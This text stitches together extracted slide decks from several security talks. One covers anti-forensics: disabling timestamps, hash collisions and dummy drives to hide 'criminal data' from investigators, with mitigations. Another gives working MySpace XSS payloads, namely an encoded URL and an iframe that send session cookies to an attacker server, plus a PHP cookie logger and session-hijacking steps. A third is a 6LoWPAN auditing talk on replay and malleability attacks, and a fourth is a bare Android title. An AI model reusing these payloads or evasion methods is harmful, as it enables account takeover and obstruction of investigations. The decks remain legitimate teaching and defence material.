$4,800
Most of an investigatorʼs “Timeline Assembly” revolve around MACE times
MACE times can be modified easily
A malicious person can modify EVERY MACE time across an entire system
LastAccess time can be
disabled in two ways:
In Windows Registry key:
HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\FileSystem
Set DWORD NtfsDisableLastAccessUpdate = 1
Open Command Prompt as Administrator:
FSUTIL behavior set disablelastaccess 1
44 hours
$13,200
Two ways to suppress “Last Accessed Time” updates
Mitigating
Scrambled MAC Times
Ignore dates on all metadata
Look for logfiles that write dates as strings
Logs are written sequentially
BIOS time changes can be identified
Identify sets of similar times
Infer mini timelines for each set
Order sets based on what you know of that app
44 hours
$13,200
Sequential logfiles can help identify timelines
Sequential Log Files:
A Timeline
This log shows 3 sets
of similar times
Order of sets can be
identified from this
sequential log
44 hours
$13,200
This logfile shows 3 sets of similar times
It also shows the ordering of each set
The BIOS time was changed twice
Malicious MACE Times
When all timestamps are scrambled, you know to
ignore the values
If all files appear normal, you will never know if a single
file has been updated to appear consistent
Investigative reports typically cite:
“this time is consistent with that time”
when describing artifacts found during analysis
44 hours
$13,200
Smart investigators never say “This occurred at this time”
They say ‘Logs show it occurred at this time’
and “This time is consistent with these other logs which reference this
action”
Confounding file analysis
“Separate
Wheat From
Chaff”
Process Data
For Analysis
#4. Analyze Data
Analyze Data
for Relevance
Prepare Report
on Findings
Archive Data
For Future
Create
Working Copy
44 hours
$13,200
When the suite youʼre using doesnʼt show you everything you want to see,
you typically take the file out of the image to your workstation
You can then use your own app to analyze the file
AF Technique #6
Restricted Filenames
Even Windows 7 still has holdovers from DOS days:
Restricted filenames
CON
PRN
AUX
NUL
COM1, COM2, COM3, COM#
LPT1, LPT2, LPT#
Use these filenames liberally
1 hour
$300
Windows 7 still has parts of DOS in it
This wonʼt take up too much time but will still frustrate the investigator.
Heʼll likely figure out whatʼs wrong in less than an hour, but will bill a full hour
of work for it.
Creating Restricted Filenames
Access NTFS volume via UNC
\\host\C$\Folder
Call Windows API function MoveFile manually from a
custom app (Kernel32.lib)
Boot from Linux with NTFS support and mv the file
45 hours
$13,500
You can’t just create a file with a restricted name. You need to trick
Windows into doing it
Mitigating
Restricted Filenames
Never export files with native filenames
Always specify a different name
FTK 4 does this by default (1.jpg)
Export by FileID or other automatically generated name
45 hours
$13,500
Your analysis machine should go by your rules. You make up the filenames.
AF Technique #7
Circular References
Folders in folders have typical limit of 255 characters
on NTFS
“Junctions” or “Symbolic Links” can point to a parent
C:\Parent\Child\Parent\Child....
Store criminal data in multiple nested files/folders
4 hours
$1,200
When a circular reference is followed, it could cause programs to enter an
infinite loop.
Other programs may detect that the path theyʼre trying to access is > 255
characters and throw an exception
Circular References
Tools that use HDD images don’t bat an eye (FTK4,
EnCase)
Many tools that recursively scan folders are affected by
this attack
“Field Triage” and “Remote Analysis” methodologies
are affected
49 hours
$14,700
Reminder: The 3 Methodologies are:
* Image Everything, Analyze Later
* Field Triage to decide what to image
* Remote Analysis, target only evidence you need
Mitigating
Circular References
Always work from an image
Be mindful of this attack when dealing with an
attacker’s live system
Just knowing about it will help you recognize it
49 hours
$14,700
AF Technique #8
Broken Log Files
Many investigators process log files with tools
These tools use string matching or
Regular Expressions
Use ƒuñ ÅsçÎÍ characters in custom messages
Commas, “quotes” and |pipes| make parsing difficult
Use eLfL (0x654c664c) in Windows Event Logs
6 hours
$1,800
eLfL is the 4byte header for Windows Event Logs
It marks the start of an eventlog record
Throwing these characters in the middle of a record will confuse some
parsers into thinking a new entry has begun
Mitigating
Broken Log Files
Do you need the log? Try to prove your point without it
Parse the few pertinent records manually and
document your methodology
At worst, write a small app/script to parse it the way
you need it to be parsed
51 hours
$15,300
Zeroing in on the specific records you need is a lot better than parsing the
whole log
AF Technique #9
Use Lotus Notes
NSF files and their .id files are headaches
There are many tools to deal with NSFs
Every one of them has its own problems
6 hours
$1,800
Lotus Notes uses NSF files to hold emails, similar to PST files.
ID files include a user ID and an encryption key that can be unlocked
with the userʼs password
2hrs per custodian
Lotus Notes
Most apps use IBM’s own Lotus Notes dlls/API to work
with NSF files
When opening each
encrypted NSF, the API raises
the password dialog:
Examiners/eDiscovery operators must select
the user’s ID file and type the associated password
for every NSF file being processed
57 hours
$17,100
The password dialog is raised in an interactive context, even when
automated
The moment the API is used to open an NSF file, this dialog is presented to
the user
This means you canʼt easily script NSF processing
Mitigating
Lotus Notes
Train yourself on Lotus Notes itself
Do not rely on NSF conversion tools
Lotus Notes is the best NSF parser but has its quirks
Once you know the quirks you can navigate around
them
57 hours
$17,100
Load up each NSF manually and deal with it using your own keyboard and
mouse
Print the notable emails to PDF to be included in your report/affidavit
#5. Report Your Findings
Confounding the reporting process
“Separate
Wheat From
Chaff”
Process Data
For Analysis
Prepare Report
on Findings
Archive Data
For Future
Create
Working Copy
Analyze Data
For Relevance
57 hours
$17,100
Reporting didnʼt seem to have many hacks at first until I started thinking
about it....
AF Technique #10
HASH Collisions
MD5 and SHA1 hashes are used to locate files
Add dummy data to your criminal files so its MD5 hash
matches known good files
Searching by hash will yield unexpected results
badfile.doc e4d909c290d0fb1ca068ffaddf22cbd0
goodfile.doc e4d909c290d0fb1ca068ffaddf22cbd0
2 hours
$600
What if you match your bad stuff with rundll.dll?
NSRL will suppress it!
Hash Collisions
Of course, this would only be useful in a select few cases:
i.e. you stole company data and stored on a volume
they could seize/search
Try explaining why GoodFile.doc and BadFile.doc have
identical hashes to judges/justices/arbiters/non-techies
could provide just-the-right-amount of
‘reasonable doubt’
59 hours
$17,700
Hash Collisions (cont.)
Lots of work has been done on this already
Marc Stevens of the Technische Universiteit Eindhoven
developed HashClash for his Masters Thesis in 2008
Other tools that exploit this are available
59 hours
$17,700
Most of the research into MD5 collisions is a result of Marc’s 2008
paper
Mitigating
HASH Collisions
Use a hash function with fewer collisions (SHA256,
Whirlpool)
Doublecheck your findings by opening each matched
file to verify the search was REALLY a success
boy would your face be red!
59 hours
$17,700
Always doublecheck your findings!
Never rely on hash matches to guarantee youʼve found the file youʼre looking
for
AF Technique #11
Dummy HDD
PC with an HDD that isn’t used
USB-boot and ignore the HDD for everyday use
Persist work on cloud/remote machine
Mimic regular usage of dummy HDD with random
writes. Use a daemon/service
3 hours
$900
Using your computer without a hard drive is very easy nowadays thanks to
large removable media
Dummy HDD (cont.)
Dummy daemon/service can:
Retrieve news webpages and write cache to HDD
Sync mail with a benign/legit mail account
Execute at random intervals
As long as the HDD has ‘recent’ entries, the
investigator will think it’s been used recently
62 hours
$18,600
Creating a “dummy service” can simulate recent usage of a computer
Mitigating
Dummy HDDs
Always check for USB drives in USB
slots AND on motherboards.
They can be SMALL these days...
Pagefile on USB drive may point to network locations
(if the OS was paging at all...)
If possible, monitor network traffic before seizure to
detect remote drive location
62 hours
$18,600
Look on the motherboard itself and identify every USB header.
Follow all USB cables to the external ports on the case.
Donʼt be fooled!
#6. Archive Data For Future
Confounding the archiving process
“Separate
Wheat From
Chaff”
Process Data
For Analysis
Archive Data
For Future
Create
Working Copy
Analyze Data
For Relevance
Prepare Report
On Findings
62 hours
$18,600
In the event a case is challenged in a year or two, firms need to archive data
for the future
Technique #1
Data Saturation
Same as Technique #1
The more data you have,
the more they need to keep
We’ve come full circle
1 hours
$20/mo per HDD
3 HDDs per month = $60
3 HDDs per year = $720
Budget Overrun
We’ve taken up roughly 63 hours of an investigator’s
time
That’s more than 8 workdays, without overtime
This extra time was spent trying to image drives, export
files, read email, and perform other menial tasks
The investigator still needs to do his regular work!
Increased likelihood that opposing council will settle
63 hours
$18,900 +
$~720/yr
Questions
Have you encountered frustration in your
examinations?
How did you deal with it?
I’d love to hear about it in the speaker Q&A room!
Thanks!
Thanks DEFCON for letting me speak
Thanks:
Forensic Friends (Josh, Joel, Nick)
Family
Coworkers
You!
Slide Availability
The slides on your CD are outdated
You can grab this latest version of these slides from:
http://www.perklin.ca/~defcon20/
perklin_antiforensics.pdf
References
Berinato, Scott. June 8, 2007. The Rise of Anti-Forensics.
Last accessed on June 12, 2012 from <http://www.csoonline.com/article/221208/the-rise-of-anti-forensics>
Max. July 3, 2011. Disk Wiping with dcfldd.
Last accessed on June 12, 2012 from <http://www.anti-forensics.com/disk-wiping-with-dcfldd>
The grugq. Unknown Date. Modern Anti-Forensics.
Last accessed on June 12, 2012 from <http://sebug.net/paper/Meeting-Documents/syscanhk/Modern%20Anti%20Forensics.pdf>
Henry, Paul. November 15, 2007. Anti-Forensics.
Last accessed on June 12, 2012 from <http://www.techsec.com/pdf/Tuesday/Tuesday%20Keynote%20-%20Anti-Forensics%20-
%20Henry.pdf>
Garfinkel, Simson. 2007. Anti-Forensics: Techniques, Detection, and Countermeasures.
Last accessed on June 12, 2012 from <http://simson.net/ref/2007/slides-ICIW.pdf>
Kessler, Gary. 2007. Anti-Forensics and the Digital Investigator.
Last accessed on June 12, 2012 from <http://www.garykessler.net/library/2007_ADFC_anti-forensics.pdf>
Hilley, S. 2007. Anti-Forensics with a small army of exploits.
Last accessed on June 12, 2012 from <http://cryptome.org/0003/anti-forensics.pdf>
References (cont.)
Dardick, G., La Roche, C., Flanigan, M. 2007. BLOGS: Anti-Forensics and Counter Anti-Forensics.
Last accessed on June 12, 2012 from < http://igneous.scis.ecu.edu.au/proceedings/2007/forensics/21-Dardick%20et.al%20BLOGS
%20ANTI-FORENSICS%20and%20COUNTER%20ANTI-FORENSICS.pdf>
Hartley, Matthew. August, 2007. Current and Future Threats to Digital Forensics.
Last accessed on June 12, 2012 from < https://dev.issa.org/Library/Journals/2007/August/Hartley-Current%20and%20Future%20Threats
%20to%20Digital%20Forensics.pdf>
Perklin, Michael. April 26, 2012. Anti-forensics: Techniques that make our lives difficult, and what we can do to mitigate them.
Presented at HTCIA Ontario Chapter, Brampton, ON. Canada.
Peron, C., Legary, M. . Digital Anti-Forensics: Emerging trends in data transformation techniques.
Last accessed on June 12, 2012 from <http://www.seccuris.com/documents/whitepapers/Seccuris-Antiforensics.pdf>
Stevens, M. June, 2007. On Collisions for MD5.
Last accessed on June 12, 2012 from <http://www.win.tue.nl/hashclash/On%20Collisions%20for%20MD5%20-%20M.M.J.%20Stevens.pdf>
Foster, J., Liu, V. July 2005. Catch Me If You Can: Exploiting Encase, Microsoft, Computer Associates, and the rest of the bunch…
Last Accessed on June 12, 2012 from <http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-foster-liu-update.pdf>
Moulton, S. July 2009. RAID Recovery: Recover your PORN by sight and sound.
Last Accessed on June 12, 2012 from <http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-scott_moulton-
raid_recovery.pdf> | pdf |
Hacking Social Lives:
MySpace.com
Presented By Rick Deacon
DEFCON 15
August 3-5, 2007
A Quick Introduction
Full-time IT Specialist at a CPA firm located in
Beachwood, OH.
Part-time Student at Lorain County
Community College and the University of
Akron.
Studying for Bachelor’s in Computer
Information Systems – Networking.
Information Technology for 7 years, security
for 4 years.
Published in 2600 Magazine.
Other Interests: Cars, Music
Presentation Overview
Introduction to MySpace.com
Introduction to Cross Site Scripting
Evading XSS Filters
MySpace Session Information and Hijacking
Tools Used to Exploit MySpace’s XSS
Current 0-Day Exploit and Demonstration
Ways to Prevent XSS Attacks
Questions
Closing
Intro to MySpace.com
One of the largest social networking sites on
the internet with millions of active users.
Driven by various dynamic web applications.
Blogs, Pictures, Videos, Chat, IM, Searches,
Classifieds, Music, Bulletins.
Major impact on today’s society.
Personal Information
Source of Social Interaction
Television, Radio, Movies and Publications.
This Presentation
MySpace’s Security
Vulnerable to many types of
attacks.
Social Engineering
Phishing
Packet Capture
Viruses
Spam
Cross Site Scripting
Well Known Vulnerabilities
“Samy” Virus
Used a worm to “Add” millions of people using XSS
and some clever scripting.
QuickTime Virus
Spread a MySpace virus by automatically editing
profiles and adding phishing links when played.
Windows MetaFile Vulnerability
Phishing Links
Sent through compromised profiles to steal
passwords and advertise.
Introduction to Cross Site
Scripting
Vulnerability found in MANY web applications.
Also called XSS.
Allows code injection
HTML, JavaScript, etc.
Can be used for phishing or browser
exploitation.
Can be used for a form of session hijacking and
cookie stealing.
Can be identified easily with the proper
methods.
Finding XSS Holes
Easiest method is to simply try and insert code into an
application.
Embed JavaScript into an web application URL to display an
alert
http://trustedsite.org/search.cgi?criteria=<script>alert(‘lolintarnetz’)</script>
Link structure used above can also be deployed to display
cookie information, redirect to a malicious script file, etc..
More information on XSS and how to quickly identify holes
can be easily found with a quick search on Google.
XSS Hole Exploits
XSS holes can be used for many purposes.
A widely used purpose would be for cookie
stealing/session information stealing.
Cookie stealing can lead to information leakage as well
as internet session hijacking.
Explanation
1.
Attacker sends an authenticated user a link that
contains XSS.
2.
Link takes auth’d user to a site that will log their cookie.
3.
Attacker reviews log file and steals information as
necessary.
MySpace & XSS
MySpace uses cookies. They are not tasty.
These cookies contain session and login information.
Also e-mail addresses and past search criteria.
Cookie may contain an encrypted password.
Session information can be used for a form of session
hijacking.
MySpace contains 100’s of undetected and undiscovered
XSS vulnerabilities.
This leaves MySpace open to pen-testing and attack.
MySpace’s XSS Filters
MySpace and many sites deploy XSS filters.
XSS filter looks for <script> tags or other
disallowed tags such as <embed>.
Filter censors these tags into “..”.
Filter acts against XSS attempts and has
closed/hindered very many XSS attacks.
Filter is not consistent throughout the site.
Portions of the site are more liberal with their
tag allowances than others.
Evading MySpace’s Filters
Filters are easily evaded using encoding.
ASCII to HEX or Unicode.
Simple encoding of <script> to
%3cscript%3e evades the filter.
Many of these evasions have been
patched further to disallow that sort of
activity, but many have not…
More Evasion
Many more evasions to use.
Trial & Error is best.
For good explanations and a bunch of
ways to evade XSS filters check out:
http://ha.ckers.org/xss.html
Previous Exploits & Evasion
Exploit uses the “Browse” function.
Found using trial & error.
Vulnerability lies within the User Search
feature a.k.a. “Browse”.
This exploit was used to steal cookies,
and to hijack current user sessions in
order to take full control of user
accounts.
Exploit has been patched.
“Browse” Exploit Encoded URL
http://searchresults.myspace.com/index.cfm?fu
seaction=advancedFind.results&websearch=1&
spotID=3&searchrequest=%22%3E%3Cdocum
ent%2Elocation=‘http://www.yourwebserver.co
m/cgi/cookiestealer.cgi%3F%20’%20%2Bdocu
ment.cookie%3c/script%3e
Explanation of Exploit
URL is encoded using HEX to evade the
filter.
XSS begins after “searchrequest=“.
The JavaScript points to a CGI file.
The CGI file records document.cookie to
a log file for review.
Could be easily replaced with a redirect
to malicious code on a foreign domain.
Captured Cookies
The Session & The Cookie
The cookie is broken down into various parts
designated by MySpace.
Contains things last display name, last logged
in e-mail, last search page, and various other
things depending on what the user just did.
Contains current session information that called
MYUSERINFO.
Session information is only valid until the user
logs out of MySpace.
MYUSERINFO
MYUSERINFO=MIHnBgkrBgEEAYI3WAOggdkwgdYG
CisGAQQBgjdYAwGggccwgcQCAwIAAQICZgMCAgD
ABAgx4RqeeUHTwgQQdmXTtwxm6gHwUd1A/AQdK
gSBmL2BMU9BuDQKmfi26sD856BoujQg/eTsCrL9d4
G2ABsAh+WnYP4n5uv8Y1rJki1U8pqa6WgpPXLKHJq
0Ct1kBE8r3J6uFbnL4QWlU1RY9HsN3uaZRkJdNGkq
4nci/qHSHJcjNp+ZP1RQ15kcNTnM1V54VEafrxcky2rp
MfJ216NQmutKwyQd9OtINVD3c41K5eTt70+EwMlR
We are interested in MYUSERINFO mostly.
This is the authenticated user’s session.
Session Hijacking
MYUSERINFO can be used to hijack the
current session of the user.
Once the user has clicked the link you have
given them via MySpace message or other
means, review the log file.
Simply copy and paste the stolen
MYUSERINFO into your current MySpace
cookie and refresh your browser
Viola. You are now the user.
0-Day Explanation
This exploit has been properly reported to MySpace’s
security team and has not yet been patched.
The exploit involves MySpace’s “Domain Generalization”.
MySpace does not perform any sort of XSS filtering on
cross-domain linking.
Simply put a page with an IFrame containing MySpace
on your web server, and use XSS to steal the cookie.
User simply needs to click the link provided and since it is
on your domain could be easily hidden as anything.
IFrame Code
This code will need to be placed on a page on your web
server.
<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="stolen
= escape(frames[0].document.cookie);
document.location='http://yourserver.com/php/cookie.php
?cookie='+(stolen)"></iframe>
IFrame
That simple IFrame with XSS embedded
within it will steal the user’s cookie.
Is more of a general vulnerability but
contains the fundamentals of XSS.
The PHP file the script calls simply calls
a text file and writes the cookie to a line
of it.
PHP File
This is the PHP file that is called in the XSS.
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $ip . "\n" . $cookie . "\n\n");
?>
The URL
This is the URL that would need to be
sent to an authenticated MySpace user.
<a
href=<http://yourserver.com./caturdaylol.
html> IT’S CATURDAY POST MOAR
CATS</a>
Note the .com. in the URL, which
enables this exploit to work.
Limitations
In this particular exploit, the user must
be using Mozilla Firefox.
The session only lasts until the user logs
out.
The person will know what link they
recently clicked and who it was from.
You may hurt your friends’ feelings.
Demonstration
Tools
Tools Used
Mozilla Firefox
Add N Edit Cookies (Firefox Extension)
Notepad (To Edit Scripts)
Brain (Or lack there of)
Useful Penetration Testing
Tools
Mozilla Firefox Extensions:
Tamper Data
Edit and view HTTP Requests.
Add N Edit Cookies
Edit cookies.
Firebug
Debug/modify web code actively.
Firekeeper
Firefox IDS.
HackBar
SQL Injection/XSS hole finder.
SwitchProxy
Torbutton
For use with Tor and Vidalia.
Tor/Vidalia
P2P proxy.
Paros
Web vulnerability scanning proxy.
Acunetix Web Vulnerability Scanner
Nikto/Wikto
Web pen testing utilities for Linux and Windows.
Questions?
Closing | pdf |
This document and its content is the property of Airbus Defence and Space.
It shall not be communicated to any third party without the owner’s written consent. All rights reserved.
Auditing 6LoWPAN networks
using Standard Penetration Testing Tools
Adam Reziouk
Arnaud Lebrun
Jonathan-Christofer Demay
2
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Presentation overview
• Why this talk ?
• What we will not talk about ?
• What we will talk about ?
3
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
The 6LoWPAN protocol
• IPv6 over Low power Wireless Personal Area Networks
• Header compression flags
• Addresses factoring (IID or predefined)
• Predefined values (e.g., TTL)
• Fields omission (when unused)
• Use of contexts (index-based)
• UDP header compression (ports and checksum)
• Packet fragmentation
• MTU 127 bytes Vs 1500 bytes
• 80 bytes of effective payload
4
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
• Already a lot of tools to work with IPv6
• nmap -6, nc6, ping6, etc.
• Nothing new here !
• Higher-layer protocols are the same
• TCP, UDP, HTTP, etc.
• Again, nothing new here !
• Why not use a USB adapter ?
• That works for Wi-Fi
• They are available
What’s the big deal ?
5
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
The IEEE 802.15.4 standard
• PHY layer and MAC sublayer
• Multiple possible configurations
• Network topology: Star Vs Mesh
• Data transfer model: Direct or Indirect, w/or w/o GTS, w/ or w/o Beacons
• Multiple security suites
• Integrity, confidentiality or both
• Integrity/Authentication code size (32, 64 or 128)
• Multiple standard revision
• 2003
• 2006 and 2011
6
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
IEEE 802.15.4-2006 security suites
Security Level b2 b1 b0
Security suite
Confidentiality
Integrity
‘000’
None
No
No
‘001’
MIC-32
No
Yes (M =4)
‘010’
MIC-64
No
Yes (M = 8)
‘011’
MIC-128
No
Yes (M = 16)
‘100’
ENC
Yes
No
‘101’
ENC-MIC-32
Yes
Yes (M =4)
‘110’
ENC-MIC-64
Yes
Yes (M = 8)
‘111’
ENC-MIC-128
Yes
Yes (M = 16)
7
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
IEEE 802.15.4-2003 security suites
Security Identifier
Security suite
Confidentiality
Integrity
0x00
None
No
No
0x01
AES-CTR
Yes
No
0x02
AES-CCM-128
Yes
Yes
0x03
AES-CCM-64
Yes
Yes
0x04
AES-CCM-32
Yes
Yes
0x05
AES-CBC-MAC-128
No
Yes
0x06
AES-CBC-MAC-64
No
Yes
0x07
AES-CBC-MAC-32
No
Yes
8
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Deviations for the standard
• One supplier builds the whole infrastructure
• Suppliers design their own firmware
• Using SoC solutions
• Complying with the customer’s specification
• Deviations can stay unnoticed unless…
• Availability failures
• Performance issues
• Digi XBee S1
• 2003 header with 2006 encryption suites
• Available since 2010 and yet no mention of this anywhere
9
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
The ARSEN project
• Advanced Routing between 6LoWPAN and Ethernet Networks
• Detecting the configuration of existing 802.15.4 infrastructures
• Network topology
• Data transfer model
• Security suite
• Standard revision
• Standard deviations
• Handling frame translation between IPv6 and 6LoWPAN
• Compression/decompression
• Fragmentation/defragmentation
• Support all possible IEEE 802.15.4 configurations
10
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Based on Scapy-radio
https://bitbucket.org
/cybertools/scapy-radio
11
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
The two main components
• The IEEE 802.15.4 scanner
• Build a database of devices and captured frames
• The devices that are running on a given channel
• The devices that are communicating with each other
• The types of frames that are exchanged between devices
• The parameters that are used to transmit these frames
• The 6LoWPAN border router
• TUN interface
• Ethernet omitted (for now)
• Scapy automaton
12
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
New Scapy layers
• Dot15d4.py
• Several bug fixes
• Complete 2003 and 2006 support
• User-provided keystreams support
• Sixlowpan.py
• Uncompressed IPv6 support
• Complete IP header compression support
• UDP header compression support
• Fragmentation and defragmentation support
13
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
IEEE 802.15.4 known attacks
• On availability
• In theory, the only possible attacks
• Equivalent to PHY-based jamming attacks
• Deal with this from a safety point of view (i.e., reboot)
• On confidentiality
• In practice, simplified key management
• Consequently, same-nonce attacks
• On integrity
• In practice, encryption-only approach and misuse of non-volatile memory
• Consequently, replay and malleability attacks
14
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
15
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
16
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
Nonce = F(SrcExtID, Frame Counter)
17
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
Nonce = F(SrcExtID, Frame Counter)
C⊗C’ = (P⊗K)⊗(P’⊗K)= P⊗P’
18
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
Nonce = F(SrcExtID, Frame Counter)
C⊗C’ = (P⊗K)⊗(P’⊗K)= P⊗P’
• Same-nonce attacks
• If one captured frame is known or guessable
• Or statistical analysis on a large number of captured frames
19
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
Nonce = F(SrcExtID, Frame Counter)
C⊗C’ = (P⊗K)⊗(P’⊗K)= P⊗P’
• Replay attacks
• Frame counters not being checked
• Frame counters not being stored in non-volatile memory
20
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
AES-CTR (2003) or CCM*-ENC (2006)
K = F(Key, Nonce, AES Counter)
With K the keystream
Nonce = F(SrcExtID, Frame Counter)
C⊗C’ = (P⊗K)⊗(P’⊗K)= P⊗P’
• Malleability attacks (useful when no physical access)
• Keystreams provided by same-nonce attacks (with a simple XOR)
• Frame counters allowed by replay attacks
21
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Application on a metering infrastructure
• Monitoring of a water distribution system
• Wireless sensor network
• Focus on two particular reachable sensors
22
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Information gathering
• Using the ARSEN scanner
• Channel 18 is used for transmission
• Sensors only communicate with the PAN_Coord
• PAN_Coord is only transmitting beacon frames
• Frame version: IEEE 802.15.4-2006 standard
• Security functions are used: AES-CTR mode
• Short_Addr are used, we will need Long_Addr
Transmitter0:
beacon_enabled=0x1
pan_coord=0x1
coord=0x1
gts=0x0
panid=0xabba
short_addr=0xde00
Transmitter1:
short_addr=0xde02
panid=0xabba
Destination0:
security_enabled=0x1
frame_version=0x1L
short_addr=0xde00
coord=0x1
command=0x0
panid=0xabba
data=0x5
pan_coord=0x1
Transmitter2:
short_addr=0xde01
panid=0xabba
Destination0:
security_enabled=0x1
frame_version=0x1L
short_addr=0xde00
coord=0x1
command=0x0
panid=0xabba
data=0x4
pan_coord=0x1
23
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Information gathering
• We need long addresses
• They are used to compute the nonce
• They are sent during association
• How to force re-association
• Sensors are tracking beacons
• Use Scapy-radio with the new Dot15d4 layer
• Flood the channel to disrupt the PAN
• The sensors cannot track beacon frames
• The sensors go into synchronization-loss state
• They then try to re-associate
Transmitter0 :
beacon_enabled=0x1
pan_coord=0x1
coord=0x1
long_addr=0x158d000053da9d
gts=0x0
panid=0xabba
short_addr=0xde00
Destination0:
frame_version=0x0L
short_addr=0xde01
command=0x1
panid=0xabba
data=0x0
long_addr=0x158d00005405a6
Destination1:
frame_version=0x0L
short_addr=0xde02
command=0x1
panid=0xabba
data=0x0
long_addr=0x158d0000540591
24
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
The association procedure
• Analysis of captured association frames
• No secure function are used during association
• No higher protocol are used for authentication
• Channels 11 to 26 are scanned (with beacon requests)
• Adding a fake sensor to the network
• No specific actions are required
• Any long address is accepted by the PAN coordinator
• No need to spoof an actual sensor (unless we want to replay frames)
• We will not be able to send encrypted frames
25
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Outgoing frame counters
• Expected behavior: reboot of sensors when loss of
synchronization lasts for a determined amount of time
• How to force the reboot of sensors
• Continuously flood the channel of the PAN coordinator (18)
• Synchronization is thus lost permanently for sensors
• Sensors look up for a PAN coordinator on all channels (11 to 26)
• If beacon requests stop for a moment, then sensors may have rebooted
• Stop flooding, let re-associations happen and observe the frame counters
If they are not stored in non-volatile memory, they will be reset on reboot
26
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Incoming frame counters
• Similar expected behavior for the PAN coordinator
• How to force the reboot of the PAN coordinator
• Create a fake PAN coordinator on a channel below 18
• Force re-association of sensors (to our fake PAN coordinator)
• If beacons stop for a moment, then the PAN coordinator may have rebooted
• Wait for beacons to come back (i.e., the PAN coordinator is up gain)
• Associate a fake sensor and replay previously captured frames
• If the beacons never stop again, replayed frames have thus been accepted
The counters have been reset (i.e., not stored in non-volatile memory)
27
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Forging encrypted frames
• We can reset outgoing frames counters
We can thus conduct same-nonce attacks
• We can reset incoming frames counters
We can thus conduct replay attacks
• Therefore, we can conduct malleability attacks
• Create a set of valid keystreams with their corresponding frame counters
• Provide this set to the new Dot15d4 Scapy layer
• Finally, set up the ARSEN border router and start auditing
higher-layer protocols and their services
28
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Demonstration bench
Node 1 with
XBee S1
Node 2 with
Xbee S1
USRP B210 used
by the ARSEN tools
ARSEN
SCAPY-Radio
GnuRadio
USRP B210
Node 1
Node 2
Tx/Rx
Tx/Rx
6LowPan
IPv6
29
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Demonstration bench
30
Adam Reziouk, Arnaud Lebrun
Jonathan-Christofer Demay
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Thank you for
your attention
https://bitbucket.org/cybertools/scapy-radio | pdf |
Android
App逆向工程與簽章技術
Joey{27350000
@
hst.tw}
